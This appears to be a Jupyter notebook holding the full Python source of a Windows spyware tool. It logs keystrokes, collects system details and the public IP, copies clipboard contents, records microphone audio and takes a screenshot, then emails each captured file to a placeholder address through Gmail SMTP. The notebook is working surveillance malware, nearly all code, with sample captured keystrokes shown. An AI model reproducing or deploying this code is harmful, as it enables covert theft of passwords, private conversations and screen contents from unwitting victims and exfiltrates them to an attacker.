In [1]:
#Libraries
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
import smtplib
import socket

import platform

#clipboard
import win32clipboard

#keyboard
from pynput.keyboard import Key,Listener



# microphone
from scipy.io.wavfile import write
import sounddevice as sd

# username
import getpass

# public ip
from requests import get

#system info
from multiprocessing import process, freeze_support
import os

# screenshot
from PIL import ImageGrab

In [2]:
# logging key_board input

keys_information = 'key_log.txt'
file_path = 'key_log.txt'

count = 0
keys = []

def on_press(key):
    global keys, count
    
    print(key)
    keys.append(key)
    count += 1
    
    if count >= 1:
        count = 0
        write_file(keys)
        keys = []
        
        
def write_file(keys):
    with open(file_path, "a") as f:
        for key in keys:
            k = str(key).replace("'", "")
            if k.find("space") > 0:
                f.write('\n')
                f.close()
            elif k.find("Key") == -1:
                f.write(k)
                f.close()
                
def on_release(key):
    if key == Key.esc:
        return False

with Listener(on_press=on_press, on_release=on_release) as listener:
    listener.join()

'c'
'a'
'p'
't'
'u'
'r'
'i'
'n'
'g'
Key.space
'k'
'e'
'y'
Key.space
'f'
'r'
'o'
'm'
Key.space
'k'
'e'
'y'
'b'
'o'
'a'
'r'
'd'
Key.enter
'a'
Key.backspace
'd'
'o'
'n'
'e'
Key.space
'c'
'a'
'p'
't'
'u'
'r'
'i'
'n'
'g'
Key.enter
Key.esc


In [4]:
sys_info = "sys_info.txt"

# fun to get system info
def get_sys_info():
    user_name = getpass.getuser()
    host_name= socket.gethostname()
    processor_info = platform.processor()
    platform_sys = platform.system()
    platform_version = platform.version()
    machine = platform.machine()
    private_ip = socket.gethostbyname(host_name)
    
    try :
            public_ip = get('https://api.ipify.org').text    
    except Exception:
            public_ip = 'exception occurs'
            
    with open(sys_info, "a") as f:
        f.write("Host :- " + host_name + '\n\n')
        f.write("Procesor :- " + processor_info + '\n')
        f.write("platform_syst :- " + platform_sys + '\n')
        f.write("platform_version :- " + platform_version + '\n')
        f.write("machine :- " + machine + '\n')
        f.write("private_ip :- " + private_ip + '\n')
        f.write("public_ip :- " + public_ip + '\n')
        f.write("user_name :- " + user_name + '\n\n')
        
get_sys_info()

In [3]:
clipboard_data = 'clipboard.txt'

# fun to get clipboard information

def get_clipboard_data():
    with open(clipboard_data, "a") as f:
        try:
            win32clipboard.OpenClipboard()
            pasted_data = win32clipboard.GetClipboardData()
            win32clipboard.CloseClipboard()
            
            f.write("Clipboard Data :- \n" + pasted_data)
        except:
            f.write("Clipboard could not be copied")

get_clipboard_data()


In [5]:
# getting microphone audio data
microphone_time = 10

audio_info = "audio.wav"

def microphone():
    #sampling frequency
    fs = 44100
    # total recording time
    rec_time = microphone_time
    
    # recording audio
    recording = sd.rec(int(rec_time * fs), samplerate = fs, channels = 2)
    sd.wait()
    
    write(audio_info, fs, recording)
    
microphone()

In [7]:
screenshot_info = "scrrenshot.png"

#fun to get screenshot
def screenshot():
    im = ImageGrab.grab()
    im.save(screenshot_info)

screenshot()

In [8]:
# to email all collected data
# From address
email_address = 'From email address'
password = 'Password of from email address'

# to address
toaddr = 'To email address'

# to send back data file via email
def send_email(filename, attachment, toaddr):
    fromaddr = email_address
    
    msg = MIMEMultipart()
    msg['From'] = fromaddr
    msg['To'] = toaddr
    msg['Subject'] = "Log File"
    
    body = "body of the massage"
    msg.attach(MIMEText(body, 'plain'))
    
    filename = filename
    attachment = open(attachment , "rb")
    
    p = MIMEBase('application', 'octet-stream')
    p.set_payload((attachment).read())
    encoders.encode_base64(p)
    
    
    p.add_header('Content-Disposition', "attachment; filename = %s" % filename)
    msg.attach(p)
    
    s = smtplib.SMTP('smtp.gmail.com', 587)
    
    s.starttls()
    
    s.login(fromaddr, password)
    text = msg.as_string()
    
    s.sendmail(fromaddr, toaddr, text)
    s.quit()

In [9]:
send_email(keys_information, file_path, toaddr)
send_email(sys_info,sys_info, toaddr)
send_email(clipboard_data, clipboard_data, toaddr)
send_email(audio_info, audio_info, toaddr)
send_email(screenshot_info, screenshot_info, toaddr)